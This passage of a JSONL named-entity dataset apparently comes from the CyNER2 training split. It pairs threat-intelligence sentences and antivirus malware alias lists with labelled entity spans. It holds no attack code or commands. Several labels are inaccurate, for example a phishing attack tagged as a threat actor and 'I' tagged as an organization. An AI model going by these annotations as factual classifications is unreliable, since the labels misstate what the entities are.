Fox-IT broke the news in December 2014, followed by the Kaspersky report in February 2015.", "spans": {"THREAT_ACTOR: The Carbanak financial APT group": [[0, 32]], "ORGANIZATION: Group-IB": [[57, 65]], "ORGANIZATION: Fox-IT": [[70, 76]], "ORGANIZATION: Kaspersky": [[126, 135]]}, "info": {"id": "cyner2_train_000620", "source": "cyner2_train"}} {"text": "Mandiant assesses with high confidence that APT43 is a moderately-sophisticated cyber operator that supports the interests of the North Korean regime.", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: APT43": [[44, 49]], 
"THREAT_ACTOR: moderately-sophisticated cyber operator": [[55, 94]]}, "info": {"id": "cyner2_train_000623", "source": "cyner2_train"}} {"text": "This is why getting access to their devices could be worth a lot more than for a normal user.", "spans": {}, "info": {"id": "cyner2_train_000624", "source": "cyner2_train"}} {"text": "ISSP informs on new wave of cyber attack in Ukraine on August 22, 2017", "spans": {}, "info": {"id": "cyner2_train_000625", "source": "cyner2_train"}} {"text": "Sowbug has been seen mounting classic espionage attacks by stealing documents from the organizations it infiltrates.", "spans": {"MALWARE: Sowbug": [[0, 6]], "ORGANIZATION: the organizations": [[83, 100]]}, "info": {"id": "cyner2_train_000627", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9973 Trojan.DownLoader25.64806 Trojan.MSILPerseus.D23337 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000630", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Wanex.A WORM_WANEX.TOMA Win32.Trojan.WisdomEyes.16070401.9500.9879 W32.Wanex WORM_WANEX.TOMA Win.Trojan.Delf-1033 Virus.Win32.Wanex Virus.Win32.Wanex.ggsj W32.Wanex!c Win32.Wanex.A Win32.HLLW.Pewk.46651 Virus.Wanex.Win32.1 backdoor.win32.xtrat.a Win32/Wanker.a GrayWare[AdWare]/Win32.Wanex.a Win32.Wanex.a.57014 Trojan/Win32.Buzus.R2227 Virus.Win32.Wanex Win32/Wanex.A Win32.Wanex Trojan-GameThief.Win32.OnLineGames Win32/Wanex.A W32/Wanexorl.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000631", "source": "cyner2_train"}} {"text": "Talos recently spotted a targeted phishing attack with several unique characteristics that are not normally seen.", "spans": {"THREAT_ACTOR: targeted phishing attack": [[25, 49]]}, "info": {"id": "cyner2_train_000633", "source": "cyner2_train"}} {"text": "Last week, thanks to the Check Point web sensor network, our researchers discovered a new and massive IoT Botnet, 
IoTroop'.", "spans": {"ORGANIZATION: the Check Point web sensor network,": [[21, 56]], "ORGANIZATION: researchers": [[61, 72]], "MALWARE: IoT Botnet, IoTroop'.": [[102, 123]]}, "info": {"id": "cyner2_train_000634", "source": "cyner2_train"}} {"text": "IRC Botnets alive, effective & evolving Magento exploits in the wild The CozyDuke toolset, which we believe has been under active development since at least 2011, consists of tools for infecting targeted hosts, establishing and maintaining backdoor access to the hosts, gathering information from them and gaining further access to other hosts inside the victim organization.", "spans": {"MALWARE: IRC Botnets": [[0, 11]], "VULNERABILITY: Magento exploits": [[40, 56]], "MALWARE: The CozyDuke toolset,": [[69, 90]], "MALWARE: backdoor": [[240, 248]]}, "info": {"id": "cyner2_train_000635", "source": "cyner2_train"}} {"text": "In particular, we identified advanced methods consistent with nation-state level capabilities including deliberate targeting and access management' tradecraft – both groups were constantly going back into the environment to change out their implants, modify persistent methods, move to new Command Control channels and perform other tasks to try to stay ahead of being detected.", "spans": {"THREAT_ACTOR: groups": [[166, 172]], "SYSTEM: environment": [[209, 220]]}, "info": {"id": "cyner2_train_000637", "source": "cyner2_train"}} {"text": "The attack originates from a phishing email containing a Word document in Arabic language.", "spans": {}, "info": {"id": "cyner2_train_000638", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom:Win32/Cryptomix.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000640", "source": "cyner2_train"}} {"text": "The downloader also uses an uncommon technique to perform a timing check to decide whether it should perform its malicious activities.", "spans": {}, "info": {"id": "cyner2_train_000641", "source": "cyner2_train"}} {"text": 
"There has been a proliferation of malware specifically designed to extract payment card information from Point-of-Sale POS systems over the last two years.", "spans": {"MALWARE: malware": [[34, 41]], "SYSTEM: Point-of-Sale POS systems": [[105, 130]]}, "info": {"id": "cyner2_train_000642", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Flooder.24292 TROJ_GICHTY.A W32/Risk.YWAF-8783 Hacktool.Flooder TROJ_GICHTY.A Win.Trojan.Gitch-1 Flooder.Win32.GichtyChatFlood.11 Trojan.Win32.GichtyChatFlood.dhga Flooder.W32.GichtyChatFlood.11!c TrojWare.Win32.Flooder.Chat.11 Trojan.Gichty.11 Tool.GichtyChatFlood.Win32.2 BehavesLike.Win32.Mydoom.mc Flooder.Chat.GichtyChatFlood.11 TR/GichtyChatFlood.11 Trojan.Heur.bmuee9li6sbi Flooder.Win32.GichtyChatFlood.11 Trojan.Win32.VB.2644 Win32/Flooder.Chat.GichtyChatFlood.11 Win32.Trojan.Gichtychatflood.Efbn Trojan.GichtyChatFlood!JHbWXCe+Dp8 Backdoor.Win32.VB Malware_fam.gw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000645", "source": "cyner2_train"}} {"text": "A backdoor also known as: Adware.Rogue.Windefender.B Aplicacion/TotalSecure2009.ae Fraudtool.TotalSecure2009!VN58ZBrXUCY Trojan-FakeAV.Win32.TotalSecure2009.ae Adware.Rogue.Windefender.B Trojan.Win32.Delflob!IK Adware.Rogue.Windefender Trojan.Fakealert.3458 Trojan:Win32/Delflob.I Adware.WinDefender2009.R.2828800 Adware.Rogue.Windefender.B Win-AppCare/Windefender.2828800 RogueAntiSpyware.WinDefender Trojan.Win32.Delflob", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000647", "source": "cyner2_train"}} {"text": "It is worth noting that this number only shows hosts potentially vulnerable to the first exploit, while the second one is also required to execute code on the router or modem.", "spans": {"VULNERABILITY: hosts potentially vulnerable": [[47, 75]], "MALWARE: exploit,": [[89, 97]], "MALWARE: execute code": [[139, 151]], "SYSTEM: router": [[159, 165]], "SYSTEM: modem.": [[169, 175]]}, "info": 
{"id": "cyner2_train_000648", "source": "cyner2_train"}} {"text": "The data is encoded prior to transmission using a dword XOR routine, so IDS technology is unlikely to see raw Track data flying around a compromised network.", "spans": {"SYSTEM: IDS technology": [[72, 86]], "SYSTEM: compromised network.": [[137, 157]]}, "info": {"id": "cyner2_train_000649", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Hupigon.AAAH Backdoor.Hupigon.AAAH Backdoor.Trojan Trojan.Dropper.Small-159 Backdoor.Hupigon.AAAH Virus.Win32.Delf!IK Packed.Win32.Klone.~KH Backdoor.Hupigon.AAAH Win32.Troj.Loader.fw.9734 TrojanDownloader:Win32/Bulilit.A Backdoor.Hupigon.AAAH BScope.HackTool.Sniffer.WpePro Backdoor.Trojan Virus.Win32.Delf W32/Shooo.A!tr Win32/Delf.2.K", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000651", "source": "cyner2_train"}} {"text": "The cybercriminal group Lurk was one of the first to effectively employ fileless infection techniques in large-scale attacks—techniques that arguably became staples for other malefactors.", "spans": {"ORGANIZATION: The cybercriminal group Lurk": [[0, 28]]}, "info": {"id": "cyner2_train_000652", "source": "cyner2_train"}} {"text": "In March 2013, the country of South Korea experienced a major cyberattack, affecting tens of thousands of computer systems in the financial and broadcasting industries.", "spans": {"SYSTEM: computer systems": [[106, 122]], "ORGANIZATION: financial": [[130, 139]], "ORGANIZATION: broadcasting industries.": [[144, 168]]}, "info": {"id": "cyner2_train_000653", "source": "cyner2_train"}} {"text": "This new RETADUP variant has features that would be useful for cybercrime instead of espionage.", "spans": {"MALWARE: RETADUP variant": [[9, 24]]}, "info": {"id": "cyner2_train_000654", "source": "cyner2_train"}} {"text": "On November 2015, Kaspersky Lab researchers identified ATMZombie, a banking Trojan that is considered to be the first malware to ever steal money from 
Israeli banks.", "spans": {"ORGANIZATION: Kaspersky Lab researchers": [[18, 43]], "MALWARE: ATMZombie,": [[55, 65]], "MALWARE: banking Trojan": [[68, 82]], "MALWARE: malware": [[118, 125]], "ORGANIZATION: Israeli banks.": [[151, 165]]}, "info": {"id": "cyner2_train_000655", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.Zbot.A4 Spyware.Zbot Trojan.Zbot.Win32.150744 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Zbot TROJ_MALKRYP.SM1 Trojan.Win32.Zbot.cuxeug Win32.Trojan.Spy.Pefj TrojWare.Win32.Injector.AYTP Trojan.PWS.Panda.2982 TROJ_MALKRYP.SM1 BehavesLike.Win32.PWSZbot.cc TrojanSpy.Zbot.ecmj TR/Spy.ZBot.rhwnxx Trojan[Spy]/Win32.Zbot Win32.Troj.Undef.kcloud Trojan:Win32/Tesch.B Trojan.Kazy.D53F00 Backdoor/Win32.Androm.R99103 BScope.Malware-Cryptor.Winlock.7414 Win32/Injector.AYPX TrojanSpy.Zbot!As9snjQ7nLU Trojan-Downloader.Win32.Carberp W32/Kryptik.WIF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000660", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clodc3b.Trojan.b7e0 Trojan/Downloader.Vqod.bq Trojan.DL.Vqod!a48Wt68Nq30 Trojan-Downloader.Win32.Vqod.bq Trojan.Win32.Vqod.cokvn Trojan.DownLoad2.31415 TR/Dldr.Vqod.bq Trojan[:HEUR]/Win32.Unknown Win32.Troj.Undef.kcloud TrojanDownloader:Win32/Lisfonp.A Win-Trojan/Vqod.57856.B TrojanDownloader.Vqod Win32.Trojan-downloader.Vqod.Pgmj Trojan-Downloader.Win32.Lisfonp W32/Vqod.BQ!tr.dldr Win32/Trojan.7ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000661", "source": "cyner2_train"}} {"text": "At launching, it checks for the presence of /var/run/dhcpclient-eth0.pid. 
file.", "spans": {}, "info": {"id": "cyner2_train_000662", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.AutoIT.Injector.S Trojan/Cosmu.bizd AutoIt.Trojan.Injector.g Trojan.Packed.40821 Trojan.Autoit.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000664", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Small!O TrojanDownloader.Pipsek.B5 Downloader.Small.Win32.48755 Trojan/Downloader.Small.bjqy TROJ_REDOSD.SMQ Win32.Trojan.KillAV.c W32/KillAV.GG Trojan.Dropper Win32/Pigeon.BCUH TROJ_REDOSD.SMQ Trojan-Downloader.Win32.Small.bjqy Trojan.Win32.Small.bdavsq Trojan.Win32.A.Downloader.48432 TrojWare.Win32.AntiAV.nhr W32/KillAV.JXYA-5937 Trojan/Win32.Antavmu Trojan.Symmi.D2028 Trojan-Downloader.Win32.Small.bjqy Downloader/Win32.Small.R14220 Trojan.Antavmu Win32/AntiAV.NHJ Trojan.Win32.FakeUsp.c Trojan.AntiAV!GuYWyLBvRFY Trojan-Downloader.Win32.Small", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000665", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Win32.Sality!O TrojanSpy.Zbot Trojan-Spy.Win32.Zbot.wjen Troj.Spy.W32.Zbot!c Trojan.PWS.Panda.9309 BehavesLike.Win32.Downloader.fc TR/AD.ZbotCitadel.kvrxb Trojan.Win32.Z.Zbot.312320.HY Trojan-Spy.Win32.Zbot.wjen Trojan/Win32.Zbot.C2294377 TrojanSpy.Zbot Trojan.Crypt.RV Win32/Spy.Zbot.AAO W32/Zbot.AAO!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000666", "source": "cyner2_train"}} {"text": "This threat can collect your sensitive information without your consent.", "spans": {}, "info": {"id": "cyner2_train_000670", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PSW.Win32.Prostor!O TrojanPWS.Prostor Trojan.Prostor.Win32.53 Trojan/PSW.Prostor.h TROJ_PROSTOR.AA Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/PWStealer.APR Win32/Prostor.D TROJ_PROSTOR.AA Win.Trojan.Ag-1 Trojan-PSW.Win32.Prostor.h Trojan.Win32.Prostor.hoip 
Trojan.Win32.PSWProstor.16896 Virus.Malware.Sbg!c TrojWare.Win32.PSW.Prostor.~I Trojan.PWS.Prostor W32/PWS.PNJG-2228 Trojan/PSW.Prostor.y KIT/Prostor.I.1 Trojan[PSW]/Win32.Prostor Trojan-PSW.Win32.Prostor.h Trojan/Win32.Prostor.C16806 Trj/Prostor.F Win32.Trojan-qqpass.Qqrob.Lkdt Trojan.PWS.Prostor!B7NqNICS3Y4 Trojan-PWS.Win32.Prostor.h Win32/Trojan.PSW.7e6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000671", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.ThundeSnS.Trojan Trojan-Clicker.Win32.VB!O Trojan.Desurou Troj.W32.Scar!c Win32.Trojan.WisdomEyes.16070401.9500.9957 Trojan.Adclicker Win32/TrojanClicker.VB.NNM TROJ_VBCLICK.SMO Win.Trojan.Adclicker-49 Trojan.Win32.Scar.qppd Win32.Trojan.Scar.Akez Trojan.DownLoad1.52605 Trojan.VB.Win32.40030 TROJ_VBCLICK.SMO Trojan/Clicker.VB.esc Trojan-Clicker.Win32.VB TR/Click.VB.esc Trojan.Heur.VP2.EF8A48 Trojan/Win32.VB.R2074 Trojan.Win32.Scar.qppd Trojan.VBRA.07317 Trojan.CL.VB!imzVbRyD0G8 Win32/Trojan.fb0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000672", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Trojan.Razy.D1E0B8 Win32.Trojan.WisdomEyes.16070401.9500.9905 TSPY_LOKI.SMA Trojan.PWS.Stealer.17779 TSPY_LOKI.SMA BehavesLike.Win32.VirRansom.nh Trojan:Win32/Pwsteal.Q!bit Trojan/Win32.naKocTb.C1675893 Win32.Trojan.Dropper.Heur Trojan.naKocTb!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000673", "source": "cyner2_train"}} {"text": "ArborNetworks For the past few months ASERT has been keeping an eye on a relatively new banking malware banker known as Pkybot", "spans": {"ORGANIZATION: ArborNetworks": [[0, 13]], "ORGANIZATION: ASERT": [[38, 43]], "MALWARE: banking malware": [[88, 103]], "MALWARE: banker": [[104, 110]], "MALWARE: Pkybot": [[120, 126]]}, "info": {"id": "cyner2_train_000675", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hoax.Win32.ArchSMS!O 
Hoax.W32.ArchSMS.HEUR.lFj0 Adware.Ziconarch.122880 Tool.SMSSend.178 Trojan.Win32.Ziconarch TR/ZipCoin.A HackTool[Hoax]/Win32.ArchSMS Trojan:Win32/Ziconarch.B.dam#2 Adware/Win32.SMSHoax.R13251 Win32/Trojan.048", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000680", "source": "cyner2_train"}} {"text": "IOCs related to an attack against banks in Poland", "spans": {"ORGANIZATION: banks": [[34, 39]]}, "info": {"id": "cyner2_train_000681", "source": "cyner2_train"}} {"text": "The ransomware author of Mole made a small mistake, which gives everyone the statistics of all the infected clients.", "spans": {"THREAT_ACTOR: The ransomware author": [[0, 21]], "MALWARE: Mole": [[25, 29]]}, "info": {"id": "cyner2_train_000682", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Trojan.Kovter Ransom_HPCERBER.SMALY0A Win32.Trojan.WisdomEyes.16070401.9500.9998 Ransom_HPCERBER.SMALY0A Trojan.Win32.Pennelas.evftsg Downloader.BloKrypt.Win32.2 BehavesLike.Win32.Ransomware.hh Trojan-Downloader.Win32.Blocrypt TrojanDownloader.BloKrypt.c TR/Pennelas.tmcdy Trojan[Downloader]/Win32.BloKrypt Downloader/Win32.BloKrypt.C1680725 Trj/GdSda.A Win32/TrojanDownloader.Blocrypt.AK Trojan.DL.BloKrypt! 
W32/Kryptik.FKEL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000683", "source": "cyner2_train"}} {"text": "Odin very much resembles another Locky variant, Zepto.", "spans": {"MALWARE: Odin": [[0, 4]], "MALWARE: Locky variant, Zepto.": [[33, 54]]}, "info": {"id": "cyner2_train_000684", "source": "cyner2_train"}} {"text": "This new campaign includes new evasive macros and demonstrates continued evolution in their tools and techniques, showcasing attacker adaptation to evolving defenses and the widespread use of sandboxes.", "spans": {"THREAT_ACTOR: campaign": [[9, 17]], "MALWARE: evasive macros": [[31, 45]], "MALWARE: tools": [[92, 97]], "THREAT_ACTOR: attacker": [[125, 133]], "SYSTEM: sandboxes.": [[192, 202]]}, "info": {"id": "cyner2_train_000687", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDropper.Oblivion Trojan/Dropper.oblivion W32/Tool.JTFL-0204 TROJ_OBLIVION.B Win.Dropper.Oblivion-3 Trojan-Dropper.Win32.Oblivion Trojan.Win32.Oblivion.dksy Trojan.Win32.Z.Oblivion.53248 Troj.Dropper.W32.Oblivion!c TrojWare.Win32.TrojanDropper.Oblivion Dropper.Oblivion.Win32.1 TROJ_OBLIVION.B BehavesLike.Win32.Dropper.qt TrojanDropper.Win32.Oblivion W32.Trojan.Backdoor-Oblivion Trojan[Dropper]/Win32.Oblivion Trojan-Dropper.Win32.Oblivion Trojan/Win32.HDC.C97188 TrojanDropper.Oblivion Trj/Oblivion.Drp Win32/TrojanDropper.Oblivion Win32.Trojan-dropper.Oblivion.Wpjr Trojan.DR.Oblivion!js3IRiusBTg Trojan-Dropper.Win32.Oblivion W32/Oblivion.A!tr Win32/Trojan.Dropper.f88", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000689", "source": "cyner2_train"}} {"text": "The other appears to be CVE-2015-1770.", "spans": {}, "info": {"id": "cyner2_train_000691", "source": "cyner2_train"}} {"text": "A backdoor also known as: P2P-Worm.Win32.Picsys!O Worm.Picsys.CC1 Worm.Picsys.Win32.3 W32/Picsys.b Win32.Worm.Picsys.a W32/Picsys.B W32.HLLW.Yoof Win32/Picsys.A WORM_SPYBOT.PA Win.Worm.Picsys-4 
P2P-Worm.Win32.Picsys.b Trojan.Win32.Picsys.cxhvjd Worm.Win32.Picsys.aab Worm.Win32.Picsys.B Win32.HLLW.Morpheus.2 WORM_SPYBOT.PA BehavesLike.Win32.Picsys.mc W32/Picsys.FYLV-4646 I-Worm/P2P.Picsys Worm[P2P]/Win32.Picsys Worm:Win32/Yoof.E Worm.Win32.P2P-Picsys.65221 Worm/Win32.Picsys.C116429 W32/Picsys.worm.b Worm.Picsys Win32/Picsys.B Worm.Picsys!vNEZkf1mA50 P2P-Worm.Win32.Picsys.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000693", "source": "cyner2_train"}} {"text": "A backdoor also known as: Uds.Dangerousobject.Multi!c Trojan.Kazy.D5BCBA TROJ_SPNR.24AI13 Win32.Trojan.WisdomEyes.16070401.9500.9995 TROJ_SPNR.24AI13 Trojan.Win32.Scar.kdnc Trojan.DownLoader7.54481 BehavesLike.Win32.VirRansom.nc TR/Slamu.A Trojan.Win32.Scar.kdnc Trojan.Kryptik!2D0DfpBZg1g W32/DotNet.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000695", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.17708.D Trojan-GameThief.Win32.OnLineGames!O TrojanPWS.OnLineGames.ZF4 Trojan.OnLineGames.Win32.42164 Trojan/OnLineGames.bnbk Trojan.Graftor.D80DC Win32.Trojan.WisdomEyes.16070401.9500.9969 Win32/Gamepass.NKR TSPY_ONLINEG.SMV Win.Spyware.67145-2 Trojan-GameThief.Win32.OnLineGames.bnbk Trojan.Win32.OnLineGames.bqvvjm Trojan.Win32.PSWIGames.17708.E TrojWare.Win32.PSW.Onlinegames.OQU.1 Trojan.PWS.Wsgame.24647 TSPY_ONLINEG.SMV Trojan[GameThief]/Win32.OnLineGames TrojanDropper:Win32/Vtimrun.C Trojan-GameThief.Win32.OnLineGames.bnbk Dropper/Win32.OnlineGameHack.R137 BScope.Trojan-Dropper.OLGames.2512 Trojan.PWS.OnLineGames!ZUTM5XqTClQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000696", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Valhalla.2048 Win32.Valhalla.2048 Trojan.Malpack Win32.Xorala Win32/Valla.2048 W32.Xorala Win32.Valhalla.2048 Virus.Win64.Xorala.cbehdj Win32.Valhalla.2048 Win32.Valhalla.2048 BehavesLike.Win64.Chir.cm W32/Xorala.b 
Win32.Valhalla.2048 Virus.Win32.Xorala Win32/Valla.2048", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000697", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Spy.Bancos.Oer Trojan-PWS.Banker6!IK Trojan-PWS.Banker6 VBCrypt.DDL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000698", "source": "cyner2_train"}} {"text": "The Locky variant of ransomware has been responsible for huge amounts of spam messages being sent on a daily basis.", "spans": {"MALWARE: The Locky variant": [[0, 17]], "MALWARE: ransomware": [[21, 31]]}, "info": {"id": "cyner2_train_000700", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.AE5C Downloader.Tibs.Win32.6 Trojan/Tibs.al Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Packed.13 Packed.Win32.Tibs.al Trojan.Win32.Small.erlei Win32.Packed.Tibs.Wtdn TrojWare.Win32.TrojanDownloader.Tibs.~mm Trojan.Packed.142 Trojan.Win32.Crypt TrojanDownloader.Tibs.amzo TR/Small.DBY.LH.14 Win32.TrojDownloader.Tibs.mm.kcloud TrojanDownloader:Win32/Nuwar.B Trojan.Heur.TP.ED17A6 Troj.Downloader.W32.Tibs.mm!c Packed.Win32.Tibs.al Trojan-Downloader.Revelation.Tibs.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000705", "source": "cyner2_train"}} {"text": "Reports on this malware family have previously been published by both Intel Security and Microsoft.", "spans": {"MALWARE: malware": [[16, 23]], "ORGANIZATION: Intel Security": [[70, 84]], "ORGANIZATION: Microsoft.": [[89, 99]]}, "info": {"id": "cyner2_train_000707", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy/W32.KeyLogger.178176.B Win32.Backdoor.Rbot.1470B0D03 WORM_SDBOT.CTJ Virus.Win32.Rbot!IK Worm/Rbot.210944 WORM_SDBOT.CTJ Heuristic.BehavesLike.Win32.PasswordStealer.H Virus.Win32.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000708", "source": "cyner2_train"}} {"text": "While some findings where very interesting, 
others were misleading or simply wrong.", "spans": {}, "info": {"id": "cyner2_train_000710", "source": "cyner2_train"}} {"text": "Mexico has previously confirmed that it is a purchaser of NSO Group's spyware.", "spans": {"THREAT_ACTOR: NSO Group's": [[58, 69]], "MALWARE: spyware.": [[70, 78]]}, "info": {"id": "cyner2_train_000711", "source": "cyner2_train"}} {"text": "A phone belonging to the Interdisciplinary Group of Independent Experts GIEI, a group of investigators from several countries, was sent text messages with links to NSO's exploit infrastructure", "spans": {"SYSTEM: phone": [[2, 7]], "ORGANIZATION: the Interdisciplinary Group of Independent Experts GIEI,": [[21, 77]], "ORGANIZATION: group": [[80, 85]], "ORGANIZATION: investigators": [[89, 102]], "MALWARE: NSO's exploit": [[164, 177]], "SYSTEM: infrastructure": [[178, 192]]}, "info": {"id": "cyner2_train_000713", "source": "cyner2_train"}} {"text": "This blog post describes another attack campaign where attackers used the Uri terror attack and Kashmir protest themed spear phishing emails to target officials in the Indian Embassies and Indian Ministry of External Affairs MEA.", "spans": {"THREAT_ACTOR: attack campaign": [[33, 48]], "THREAT_ACTOR: attackers": [[55, 64]], "ORGANIZATION: the Indian Embassies and Indian Ministry of External Affairs MEA.": [[164, 229]]}, "info": {"id": "cyner2_train_000714", "source": "cyner2_train"}} {"text": "After publication I was contacted by another analyst who was able to link the information from my blog to other samples from an actual campaign.", "spans": {"ORGANIZATION: I": [[18, 19]], "ORGANIZATION: analyst": [[45, 52]], "THREAT_ACTOR: an actual campaign.": [[125, 144]]}, "info": {"id": "cyner2_train_000715", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Etumbotb Trojan/Ixeshe.i Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Etumbot.I Backdoor.Typideg Trojan.Etumbot.1 Trojan.Ixeshe.Win32.30 BKDR_ETUMBOT.UQU Trojan.Etumbot 
W32/Etumbot.UDKV-8115 Trojan.Graftor.D234F5 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000717", "source": "cyner2_train"}} {"text": "The researcher came upon an interesting set of emails, which were soon determined to be part of a widespread spam campaign.", "spans": {"ORGANIZATION: researcher": [[4, 14]], "THREAT_ACTOR: widespread spam campaign.": [[98, 123]]}, "info": {"id": "cyner2_train_000718", "source": "cyner2_train"}} {"text": "The site was infected with an iframe injector that redirects to Angler EK.", "spans": {"MALWARE: Angler EK.": [[64, 74]]}, "info": {"id": "cyner2_train_000720", "source": "cyner2_train"}} {"text": "The number of LINE users in Taiwan reaches up to 17 million in the same year.", "spans": {"ORGANIZATION: LINE": [[14, 18]]}, "info": {"id": "cyner2_train_000721", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.RockRat.S1875120 Troj.W32.Rockrat!c Trojan.Johnnie.D1566D Win32.Trojan.WisdomEyes.16070401.9500.9957 W32/Trojan.IKOU-3732 Backdoor.Rokrat TROJ_KORPODE.A Win.Trojan.Rokrat-6443187-0 Trojan.Win32.RockRat.exmijf Trojan.Inject3.2444 Trojan.RockRat.Win32.1 W32/RockRat.A Trojan.RockRat.a W32/FakeAV.BCMZ!tr Trojan/Win32.RockRat Trojan:Win32/Korpode.A!dha Trojan/Win32.Loader.R219535 Trj/CI.A Win32.Trojan.Rockrat.Ljuk Trojan.RockRat! 
Win32/Trojan.549", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000722", "source": "cyner2_train"}} {"text": "The injected code attempts to download them all and execute.", "spans": {}, "info": {"id": "cyner2_train_000724", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Mudrop!O Spyware.WSLogger Trojan/Dropper.Mudrop.hs Win32.Trojan.WisdomEyes.16070401.9500.9934 W32/Risk.AAJK-2149 Infostealer.Tarno.B Win32/Mdrop.MD not-a-virus:PSWTool.Win32.WSLogger.a Trojan.Win32.Mudrop.dgpnb Trojan.WSLogger.38 BehavesLike.Win32.Wabot.cc W32/Dropper.AOIJ TrojanDropper.Mudrop.amp Trojan[Dropper]/Win32.Mudrop TrojanDropper:Win32/Spiloog.A!bit not-a-virus:PSWTool.Win32.WSLogger.a Dropper/Win32.Mudrop.R19044 TrojanDropper.Mudrop Trojan.DR.Mudrop!uBx16xyI0u0 Trojan-Dropper.Win32.Mudrop", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000725", "source": "cyner2_train"}} {"text": "A backdoor also known as: BackDoor.Rurktar.3 Backdoor:MSIL/Rurktar.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000727", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Jorik.IRCbot.iia Win32.Trojan.WisdomEyes.16070401.9500.9935 Win32.Worm.Autorun.R TrojWare.Win32.Kryptik.ACZQ Win32.HLLW.Autoruner1.3120 Trojan.Jorik.Win32.159726 BehavesLike.Win32.RAHack.pt Trojan/Jorik.ayqm Trojan/Win32.IRCbot Trojan.IRCbot Win32.Crypt W32/Jorik.FSC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000730", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod94b.Trojan.33b2 Trojan.Proxy.Webber.B Trojan-Proxy/W32.Webber.6176 Trojan/Proxy.Webber.b Trojan.PR.Webber!M1rEz2z+nTg W32/Webber.XHQG-0071 Backdoor.Exdis Webber.CB Trojan-Proxy.Win32.Webber.b Trojan.Proxy.Webber.B Trojan.Win32.Webber.ejli Hoax.W32.Renos Trojan.Proxy.Webber.B TrojWare.Win32.TrojanProxy.Webber.B Trojan.Proxy.Webber.B Trojan.Webber.Win32.42 BehavesLike.Win32.Dropper.xm 
